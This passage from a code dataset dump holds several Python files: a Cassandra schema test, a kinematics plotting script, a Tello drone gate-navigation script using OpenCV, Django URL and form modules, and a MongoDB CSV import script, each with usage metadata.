"usage_type": "call"}, {"api_name": "random.randint", "line_number": 406, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 417, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 430, "usage_type": "attribute"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 432, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 432, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 432, "usage_type": "call"}, {"api_name": "random.seed", "line_number": 433, "usage_type": "call"}, {"api_name": "time.clock", "line_number": 434, "usage_type": "call"}, {"api_name": "time.clock", "line_number": 438, "usage_type": "call"}, {"api_name": "Animation.animation.Animation", "line_number": 447, "usage_type": "call"}, {"api_name": "time.process_time", "line_number": 449, "usage_type": "call"}, {"api_name": "time.process_time", "line_number": 454, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 456, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 456, "usage_type": "name"}]} +{"seq_id": "183670220", "text": "from cassandra.cluster import Cluster\n\ncluster = Cluster(['172.17.0.2 '])\nsession = cluster.connect()\n\nprint(cluster)\nprint(session)\nsession.execute(\"\"\"\n\n\"\"\")\n\n\"\"\"\nCREATE KEYSPACE IF NOT EXISTS db WITH replication = { 'class': 'SimpleStrategy', 'replication_factor': '2' }\n\"\"\"\n\n\"\"\"\nCREATE TYPE db.articles (id UUID, title text, article_text text, author text, date text, modified text, url text);\n\"\"\"\n\n\"\"\"\nCREATE TYPE db.comments (id UUID, text text, date text, author text, article_url text);\n\"\"\"\n\n\"\"\"\nCREATE TYPE db.tags (id UUID, tag text, article_url text);\n\"\"\"\n\n\"\"\"\nCREATE TABLE db.articles ( id UUID PRIMARY KEY, article_url text, article_title text, author text, date text, modified text, tags list>, comments list> );\n\"\"\"\n\n\"\"\"\nCREATE TABLE db.users (id UUID PRIMARY KEY, name text, email_address text, password text, gravatar_url text);\n\"\"\"\n# https://stackoverflow.com/questions/40713693/inserting-null-values-into-cassandra\n# This is pretty cool. You don't have to set anything to any of these variables. Not null , not nothing.\n", "sub_path": "testCassandra.py", "file_name": "testCassandra.py", "file_ext": "py", "file_size_in_byte": 1068, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "cassandra.cluster.Cluster", "line_number": 3, "usage_type": "call"}]} +{"seq_id": "248565178", "text": "import numpy as np\nimport matplotlib.pyplot as plt\n\n\nl1, l2, omega1 = 32, 100, 5\ntheta1_deg = np.arange(0, 361, 1)\ntheta1_rad = [np.deg2rad(th) for th in theta1_deg]\n\ntheta2_rad = np.arccos((-l1 * np.cos(theta1_rad)) / l2) + np.pi\ntheta2_deg = [np.rad2deg(th) for th in theta2_rad]\nl3 = l1 * np.sin(theta1_rad) + l2 * np.sin(theta2_rad)\n\nomega2 = -(l1 * omega1 * np.sin(theta1_rad)) / (l2 * np.sin(theta2_rad))\nv = -l1 * omega1 * np.cos(theta1_rad) - l2 * omega2 * np.cos(theta2_rad)\n\nalpha2 = (l1 * omega1 ** 2 * np.cos(theta1_rad) + l2 * omega2 **\n 2 * np.cos(theta2_rad)) / l2 * np.sin(theta2_rad)\na = l1 * omega1 ** 2 * np.sin(theta1_rad) - l2 * alpha2 * \\\n np.cos(theta2_rad) + l2 * omega2 ** 2 * np.sin(theta2_rad)\n\n# 最大值和最小值\nprint(\"l3(max)={}, v(max)={}, a(max)={}\".format(\n np.max(l3), np.max(v), np.max(a)))\nprint(\"l3(min)={}, v(min)={}, a(min)={}\".format(\n np.min(l3), np.min(v), np.min(a)))\n\n# 位移\nax1 = plt.subplot(211)\nax1.plot(theta1_deg, l3)\nax1.set_title(r\"$l_{1}-\\theta_{1}$\")\nax1.set_xlabel(r\"$\\theta_{1}$\")\nax1.set_ylabel(r\"$l_{1}/(mm)$\")\nax1.grid()\n\n# 速度\nax2 = plt.subplot(223)\nax2.plot(theta1_deg, v)\nax2.set_title(r\"$v-\\theta_{1}$\")\nax2.set_xlabel(r\"$\\theta_{1}$\")\nax2.set_ylabel(r\"$v/(mm/s)$\")\nax2.grid()\n\n# 加速度\nax3 = plt.subplot(224)\nax3.plot(theta1_deg, a)\nax3.set_title(r\"$a-\\theta_{1}$\")\nax3.set_xlabel(r\"$\\theta_{1}$\")\nax3.set_ylabel(r\"$a/(mm/s^{2})$\")\nax3.grid()\n\nplt.show()", "sub_path": "3rd/plot.py", "file_name": "plot.py", "file_ext": "py", "file_size_in_byte": 1448, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "numpy.arange", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.deg2rad", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.arccos", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 9, "usage_type": "attribute"}, {"api_name": "numpy.rad2deg", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}]} +{"seq_id": "485907695", "text": "import numpy as np\nimport cv2\nimport imutils\nimport time\n#import tellopy\n#import av\nfrom djitellopy import Tello\n\ndrone = Tello()\n\ntry:\n drone.connect()\n #drone.wait_for_connection(60.0)\nexcept Exception as ex:\n print(ex)\n exit()\n\n#drone.streamon()\n#print(\"Hello hello hello\")\n#frame_read = drone.get_frame_read()\n\n#camera = frame_read\n#print(\"before\")\n#camera = av.open(drone.get_video_stream())\n#print(\"after\")\n#time.sleep(5)\ntry:\n drone.takeoff()\nexcept:\n drone.land()\n exit()\n#time.sleep(10)\n\ndrone.streamon()\n\ncamera = drone.get_frame_read()\niterators=0\nclose = False\nwhile (True):\n \n\n \n # get_corners():\n ### Grabbing the video feed, \"has frames\" and \"grabbed\" check if\n ###there's a next frame, if there isn't, the feed will stop\n\n ### We'll have \"img\" and \"image\" for different purposes. \"image\" is the\n ### original video on top of which we draw, \"img\" is the one masked and\n ### used for getting contours to know what to draw.\n #try:\n print(\"Camera try\")\n img = camera.frame\n image = camera.frame\n #cv2.imwrite(\"img.png\", img)\n if img is None:\n print(\"none\")\n continue\n #except:\n # print(\"Camera fail\")\n # continue\n #hasFrames, image = camera.read()\n #except:\n # drone.land()\n #grabbed, img = camera.read()\n #image = img\n ### Changing the frame into hsv colors and blurring it in various ways to smoothen\n \"\"\"\n if (iterators == 0):\n drone.move_left(20)\n iterators += 1\n time.sleep(0.5)\n if (iterators == 1):\n drone.move_right(20)\n iterators += 1\n time.sleep(0.5)\n if (iterators == 2):\n drone.land()\n time.sleep(0.5)\n iterators += 2\n \"\"\"\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n\n blur_hsv = cv2.GaussianBlur(hsv, (1,1),0)\n blur_hsv = cv2.medianBlur(blur_hsv, 5)\n\n\n ### Create a white mask of the shape and blur the hell out of it\n\n mask = cv2.inRange(blur_hsv,(33, 90, 90), (80, 255, 255) )\n\n blur_mask = cv2.GaussianBlur(mask, (1, 1), 0)\n blur_mask = cv2.medianBlur(blur_mask, 21)\n\n kernel = np.ones((11, 11), np.float32) * 255\n kernelImg = np.zeros([50, 50, 3], dtype=np.uint8)\n kernelImg.fill(255)\n\n mask = cv2.erode(blur_mask, kernel, iterations=3)\n\n mask = cv2.dilate(blur_mask, kernel, iterations=3)\n\n\n ###Resulting \"img\" used for contour counting\n img = blur_mask\n #cv2.imshow('showing', img)\n\n\n ### Gets edges and makes contours out of them and sorts them into a list\n edged = cv2.Canny(img, 10, 550)\n edged = cv2.medianBlur(edged, 1)\n #cv2.imshow('Filming', edged)\n\n cnts = cv2.findContours(img.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n cnts = imutils.grab_contours(cnts)\n\n #hull = np.array([[[5,5]],[[5,5]]])\n\n ### Empty list to be used later\n lista = np.array([])\n count = 0\n\n ###\n for c in cnts:\n\n ### approximate the contour and set minimum length fo rrecongised contours\n peri = cv2.arcLength(c, True)\n if peri >= 410:\n print(\"contours\")\n approx = cv2.approxPolyDP(c, 0.05 * peri, True)\n\n ### Collect long enough contours into the list\n lista = np.append(lista,approx).astype(int)\n count += len(approx)\n\n else:\n continue\n\n ### If there are between 4 and 10 corners, draw the contour on the \"image\"\n if len(approx) >= 4 and len(approx) <= 10:\n #cv2.imwrite(\"Test.png\", image)\n cv2.drawContours(image, [approx], -1, (0, 0, 255), 5)\n\n try:\n ### This is \"try\", because all frames don't have contours and otherwise it would end the code\n print(\"try listing\") \n lista = np.reshape(lista, (count, 2))\n\n except:\n continue\n\n mask2 = cv2.inRange(image, (0, 0, 250), (0, 0, 255))\n gray = mask2\n \n inline = False\n inlevel = False\n centered = False\n \n\n try:\n ### Draw the connecting contour (green) and use convex hull to surround it to get outermost edges and corners\n print(\"trying to get contours\")\n cv2.drawContours(image, [lista], -1, (0, 255, 0), 5)\n hull = cv2.convexHull(lista)\n cv2.drawContours(image,[hull], -1, (255,0,0),5)\n mask3 = cv2.inRange(image, (252, 0, 0), (255, 0, 0))\n\n corners = cv2.goodFeaturesToTrack(mask3, 4, 0.05, 110)\n corners = np.int0(corners)\n \n print(\"halfway contours\")\n ### This get and draws he center of gate\n ret, labels, stats, centroids = cv2.connectedComponentsWithStats(mask3)\n mask3 = cv2.cvtColor(mask3, cv2.COLOR_GRAY2BGR)\n for i in centroids[1:]:\n cv2.rectangle(image, (int(i[0]), int(i[1])), (int(i[0] + 5), int(i[1] + 5)), (255, 0, 0), 3)\n ### And this gets the center of image frame\n center_width = int(image.shape[1]/2)\n center_height = int(image.shape[0]/2)\n cv2.circle(image, (center_width, center_height), 10, (0, 0, 255), -1)\n print(\"end contours\")\n ### Here we compare the two different centers to determine where to move\n #cv2.imshow(\"image\", image)\n #cv2.imshow(\"img\", img)\n\n\n if center_width - centroids[1][0] > 35:\n print('Fly Left')\n drone.move_left(20)\n time.sleep(0.1)\n \n elif center_width - centroids[1][0] < -35:\n print('Fly Right')\n drone.move_right(20)\n time.sleep(0.25)\n \n else:\n print('Stay in line')\n inline = True\n\n if center_height - centroids[1][1] > 105:\n print('Fly Up')\n drone.move_up(20)\n time.sleep(0.25)\n\n elif center_height - centroids[1][1] < 45:\n print('Fly Down')\n drone.move_down(20)\n time.sleep(0.25)\n else:\n print('Stay in Level')\n inlevel = True\n time.sleep(0.25)\n\n ### Draws yellow corners on \"image\"\n for i in corners:\n x, y = i.ravel()\n cv2.circle(image, (x, y), 1, (0,255,255), -1)\n\n\n target = [0,255,255]\n X,Y = np.array(np.where(np.all(image==target, axis=2)))\n\n coordinates = np.array([])\n for c in range(0,19,5):\n coordinates = np.append(coordinates,X[c])\n coordinates = np.append(coordinates, Y[c])\n\n coordinates = np.reshape(coordinates,(4,2))\n\n except:\n drone.rotate_counter_clockwise(15)\n time.sleep(0.25)\n print(\"didn't get contours\")\n \n continue\n\n #cv2.imshow(\"gate2\", image)\n\n #time.sleep(0.05)\n\n #if cv2.waitKey(1) & 0xFF == ord('q'):\n #break\n\n\n #cv2.imshow(\"gate2\", image)\n\n # cv2.imshow('Filming', img)\n #time.sleep(0.05)\n\n #if cv2.waitKey(1) & 0xFF == ord('q'):\n #break\n bot_left = np.argmin(coordinates[2:4,1]) + 2\n top_left = np.argmin(coordinates[0:2,1])\n bot_right = np.argmax(coordinates[2:4,1]) + 2\n top_right = np.argmax(coordinates[0:2,1])\n try:\n \n\n #print(coordinates[bot_left])\n #print(coordinates[2])\n if (coordinates[bot_left][0] - coordinates[top_left][0]) - (coordinates[bot_right][0] - coordinates[top_right][0]) >6:\n #print()\n #print('Rotate to Left ')\n #print()\n drone.rotate_counter_clockwise(5)\n time.sleep(0.25)\n \n if (coordinates[bot_right][0] - coordinates[top_right][0]) - (coordinates[bot_left][0] - coordinates[top_left][0]) >6:\n #print()\n #print('Rotate to Right ')\n #print()\n drone.rotate_clockwise(5)\n time.sleep(0.25)\n\n else:\n #print()\n #print('Centered')\n #print()\n centered = True\n \n if (coordinates[bot_left][0] - coordinates[top_left][0]) < 490 and close == False:\n speed = 2.5/(coordinates[bot_left][0] - coordinates[top_left][0])*4900\n print(speed)\n if speed < 20:\n speed = 20\n drone.move_forward(int(speed))\n #close = False\n else:\n close = True\n\n except:\n print(\"rotate exception\")\n continue\n\n try:\n leftRigthDist = (coordinates[bot_left][0] - coordinates[top_left][0])>(coordinates[bot_right][0] - coordinates[top_right][0])\n if ((leftRightDist and (coordinates[top_right][1]-coordinates[top_left][1])<200) and close):\n drone.move_right(20)\n print(\"moving right\")\n time.sleep(0.25)\n elif ((leftRightDist and (coordinates[top_right][1]-coordinates[top_left][1])<200) and close):\n drone.move_left(20)\n print(\"moving right\")\n time.sleep(0.25)\n \n except:\n print(\"Angle exception\")\n \n print(inline, inlevel, centered, close)\n if inline and inlevel and centered and close:\n cv2.imwrite(\"img.png\", img)\n cv2.imwrite(\"image.png\", image)\n drone.move_forward(250)\n time.sleep(0.25)\n break\n \ntime.sleep(0.5)\ndrone.land()\n#drone.quit()\ncamera.release()\n#cv2.destroyAllWindows()\n\n\n", "sub_path": "FlyingTest.py", "file_name": "FlyingTest.py", "file_ext": "py", "file_size_in_byte": 9199, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "djitellopy.Tello", "line_number": 9, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 81, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 81, "usage_type": "attribute"}, {"api_name": "cv2.GaussianBlur", "line_number": 83, "usage_type": "call"}, {"api_name": "cv2.medianBlur", "line_number": 84, "usage_type": "call"}, {"api_name": "cv2.inRange", "line_number": 89, "usage_type": "call"}, {"api_name": "cv2.GaussianBlur", "line_number": 91, "usage_type": "call"}, {"api_name": "cv2.medianBlur", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 94, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 95, "usage_type": "attribute"}, {"api_name": "cv2.erode", "line_number": 98, "usage_type": "call"}, {"api_name": "cv2.dilate", "line_number": 100, "usage_type": "call"}, {"api_name": "cv2.Canny", "line_number": 109, "usage_type": "call"}, {"api_name": "cv2.medianBlur", "line_number": 110, "usage_type": "call"}, {"api_name": "cv2.findContours", "line_number": 113, "usage_type": "call"}, {"api_name": "cv2.RETR_EXTERNAL", "line_number": 113, "usage_type": "attribute"}, {"api_name": "cv2.CHAIN_APPROX_SIMPLE", "line_number": 113, "usage_type": "attribute"}, {"api_name": "imutils.grab_contours", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 119, "usage_type": "call"}, {"api_name": "cv2.arcLength", "line_number": 126, "usage_type": "call"}, {"api_name": "cv2.approxPolyDP", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 132, "usage_type": "call"}, {"api_name": "cv2.drawContours", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 146, "usage_type": "call"}, {"api_name": "cv2.inRange", "line_number": 151, "usage_type": "call"}, {"api_name": "cv2.drawContours", "line_number": 162, "usage_type": "call"}, {"api_name": "cv2.convexHull", "line_number": 163, "usage_type": "call"}, {"api_name": "cv2.drawContours", "line_number": 164, "usage_type": "call"}, {"api_name": "cv2.inRange", "line_number": 165, "usage_type": "call"}, {"api_name": "cv2.goodFeaturesToTrack", "line_number": 167, "usage_type": "call"}, {"api_name": "numpy.int0", "line_number": 168, "usage_type": "call"}, {"api_name": "cv2.connectedComponentsWithStats", "line_number": 172, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 173, "usage_type": "call"}, {"api_name": "cv2.COLOR_GRAY2BGR", "line_number": 173, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 175, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 179, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 189, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 194, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 203, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 208, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 212, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 217, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 221, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 221, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 221, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 223, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 225, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 226, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 228, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 232, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 252, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 253, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 254, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 255, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 266, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 273, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 300, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 304, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 311, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 312, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 314, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 317, "usage_type": "call"}]} +{"seq_id": "339236833", "text": "from django.urls import path\nfrom movieinfo import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"movies/\", views.movie_list, name=\"movies_list\"),\n path(\"/\", views.actor_detail, name=\"actor_detail\"),\n path(\"/movies//\",\n views.movie_detail, name=\"movie_detail\"),\n path(\"actors/new/\", views.actor_new, name=\"actor_new\"),\n path(\"/movies/new/\",\n views.movie_new, name=\"movie_new\"),\n path(\"/movies//reviews/new/\",\n views.review_new, name=\"review_new\"),\n path(\n \"/movies//reviews//edit/\", views.review_edit, name=\"review_edit\"\n ),\n path(\n \"/movies//reviews//delete/\",\n views.review_delete,\n name=\"review_delete\",\n ),\n path(\"/movies//videos/new/\",\n views.video_new, name=\"video_new\"),\n\n]\n", "sub_path": "과제 20210806/03 송예지/movieinfo/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 954, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.urls.path", "line_number": 5, "usage_type": "call"}, {"api_name": "movieinfo.views.index", "line_number": 5, "usage_type": "attribute"}, {"api_name": "movieinfo.views", "line_number": 5, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "movieinfo.views.movie_list", "line_number": 6, "usage_type": "attribute"}, {"api_name": "movieinfo.views", "line_number": 6, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "movieinfo.views.actor_detail", "line_number": 7, "usage_type": "attribute"}, {"api_name": "movieinfo.views", "line_number": 7, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "movieinfo.views.movie_detail", "line_number": 9, "usage_type": "attribute"}, {"api_name": "movieinfo.views", "line_number": 9, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "movieinfo.views.actor_new", "line_number": 10, "usage_type": "attribute"}, {"api_name": "movieinfo.views", "line_number": 10, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "movieinfo.views.movie_new", "line_number": 12, "usage_type": "attribute"}, {"api_name": "movieinfo.views", "line_number": 12, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "movieinfo.views.review_new", "line_number": 14, "usage_type": "attribute"}, {"api_name": "movieinfo.views", "line_number": 14, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "movieinfo.views.review_edit", "line_number": 16, "usage_type": "attribute"}, {"api_name": "movieinfo.views", "line_number": 16, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 18, "usage_type": "call"}, {"api_name": "movieinfo.views.review_delete", "line_number": 20, "usage_type": "attribute"}, {"api_name": "movieinfo.views", "line_number": 20, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 23, "usage_type": "call"}, {"api_name": "movieinfo.views.video_new", "line_number": 24, "usage_type": "attribute"}, {"api_name": "movieinfo.views", "line_number": 24, "usage_type": "name"}]} +{"seq_id": "309922850", "text": "from django.conf.urls import url\nfrom users.views import *\n\nurlpatterns = [\n\turl(r'^web/user/get/select/$', UserCreateAPIView.as_view(), name=\"get_select\"),\n\turl(r'^web/user/set/insert/$', UserCreateAPIView.as_view(), name=\"set_user\"),\n\turl(r'^web/user/set/password/$', ResetPassword.as_view(), name=\"reset_password\"),\n\turl(r'^web/logout/$', Logout.as_view(), name=\"logout\"),\n\turl(r'^web/user/get/select/(?P[0-9]+)/$', UserDetailAPIView.as_view(), name=\"detail_user\"),\n\turl(r'^web/user/set/update/(?P[0-9]+)/$', UserDetailAPIView.as_view(), name=\"update_user\"),\n\turl(r'^web/user/set/delete/(?P[0-9]+)/$', UserDetailAPIView.as_view(), name=\"delete_user\"),\n\n\turl(r'^web/type_user/get/select/$', TypeUserListAPIView.as_view(), name=\"list_type_user\"),\n\turl(r'^web/type_user/set/insert/$', TypeUserListAPIView.as_view(), name=\"insert_type_user\"),\n\turl(r'^web/type_user/set/update/(?P[0-9]+)/$', TypeUserDetailAPIView.as_view(), name=\"update_type_user\"),\n\turl(r'^web/type_user/set/delete/(?P[0-9]+)/$', TypeUserDetailAPIView.as_view(), name=\"delete_type_user\"),\n\turl(r'^web/type_user/get/select/(?P[0-9]+)/$', TypeUserDetailAPIView.as_view(), name=\"select_type_user\"),\n\turl(r'^web/type_user/get/sselect/$', TypeUserComboAPIView.as_view(), name=\"combo_type_user\"),\n\n\turl(r'^web/userapp/set/insert/$', SysUserAppCreateAPIView.as_view(), name=\"set_userapp\"),\n\turl(r'^web/userapp/get/select/$', SysUserAppCreateAPIView.as_view(), name=\"select_userapp\"),\n\turl(r'^web/userapp/set/update/(?P[0-9]+)/$', SysUserAppDetailAPIView.as_view(), name=\"detail_userapp\"),\n\turl(r'^web/userapp/get/select/(?P[0-9]+)/$', SysUserAppDetailAPIView.as_view(), name=\"get_select\"),\n\turl(r'^web/userapp/set/delete/(?P[0-9]+)/$', SysUserAppDetailAPIView.as_view(), name=\"set_delete\"),\n\n\turl(r'^web/configuration/get/select/$', ConfigurationAPIView.as_view(), name=\"get_configuration\"),\n\turl(r'^web/configuration/set/update/$', ConfigurationAPIView.as_view(), name=\"update_configuration\"),\n]\n", "sub_path": "tmp/users/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1993, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.conf.urls.url", "line_number": 5, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 6, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 13, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 16, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 17, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 18, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 20, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 21, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 22, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 23, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 24, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 26, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 27, "usage_type": "call"}]} +{"seq_id": "41153333", "text": "import json\n\n\nfrom django import forms\n\nfrom .models import GenericModel\nfrom .utils import get_form_fields\n\n\nclass FlexibleForm(forms.ModelForm):\n\n def __init__(self, *args, instance=None, **kwargs):\n super(FlexibleForm, self).__init__(*args, instance=instance, **kwargs)\n\n if instance:\n initials = json.loads(instance.data)\n else:\n initials = {}\n\n self._extra_fields = get_form_fields(initials)\n\n self.fields.update(self._extra_fields)\n\n def save(self, commit=True):\n if hasattr(self, 'data'):\n self.instance.data = json.dumps(\n {\n field_name: self.cleaned_data[field_name]\n for field_name in self._extra_fields.keys()\n }\n )\n\n return super(FlexibleForm, self).save(commit)\n\n class Meta:\n model = GenericModel\n fields = []\n", "sub_path": "hhcodingtask/data_saver/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 908, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.forms.ModelForm", "line_number": 10, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 10, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 16, "usage_type": "call"}, {"api_name": "utils.get_form_fields", "line_number": 20, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 26, "usage_type": "call"}, {"api_name": "models.GenericModel", "line_number": 36, "usage_type": "name"}]} +{"seq_id": "231651007", "text": "import os\nimport sys\nimport csv\nimport logging\n\nfrom pymongo.errors import DuplicateKeyError\nfrom pyramid.paster import (\n get_appsettings,\n setup_logging,\n)\n\nfrom pyramid.scripts.common import parse_vars\n\nfrom airflight.collections import mongo_client_\nfrom ..collections import AirportCollection, AirlineCollection, RouteCollection\n\nlogger = logging.getLogger(__name__)\n\n\ndef usage(argv):\n cmd = os.path.basename(argv[0])\n print('usage: %s [var=value]\\n'\n '(example: \"%s development.ini\")' % (cmd, cmd))\n sys.exit(1)\n\n\ndef main(argv=sys.argv):\n \"\"\"\n Import data into mongo collections\n \"\"\"\n here = os.path.dirname(__file__)\n # Create file key with absolute path, class and fields\n COLLECTIONS = [\n {'klass': AirlineCollection,\n 'file': os.path.join(here, '../../data/airlines.csv'),\n 'fields': [\n 'name',\n '2_digit_code',\n '3_digit_code',\n 'country'\n ]\n },\n {'klass': AirportCollection,\n 'file': os.path.join(here, '../../data/airports.csv'),\n 'fields': [\n 'name',\n 'city',\n 'country',\n 'iata_3',\n 'latitute',\n 'longitude'\n ]\n },\n {'klass': RouteCollection,\n 'file': os.path.join(here, '../../data/routes.csv'),\n 'fields': [\n 'airline_id',\n 'origin',\n 'destination'\n ]\n }\n ]\n\n if len(argv) < 2:\n usage(argv)\n config_uri = argv[1]\n options = parse_vars(argv[2:])\n setup_logging(config_uri)\n settings = get_appsettings(config_uri, options=options)\n # Setup of MongoClient\n mongo_client_.setup(url=settings.get('mongo.url'),\n db=settings.get('mongo.db'))\n for collection in COLLECTIONS:\n\n mongo_collection = collection['klass']()\n with open(collection['file'], 'r') as csv_file:\n fields = collection['fields']\n csv_reader = csv.reader(csv_file, delimiter=',')\n for k, row in enumerate(csv_reader):\n # must ignore the headers\n if k > 0:\n # Convert to dict using fields\n to_dict = dict(zip(fields, row))\n try:\n mongo_collection.insert(data=to_dict)\n except DuplicateKeyError as e:\n logger.info(f\"This data already exist {str(to_dict)} \\n\") # noqa\n", "sub_path": "airflight/scripts/initialize_db.py", "file_name": "initialize_db.py", "file_ext": "py", "file_size_in_byte": 2529, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "logging.getLogger", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", 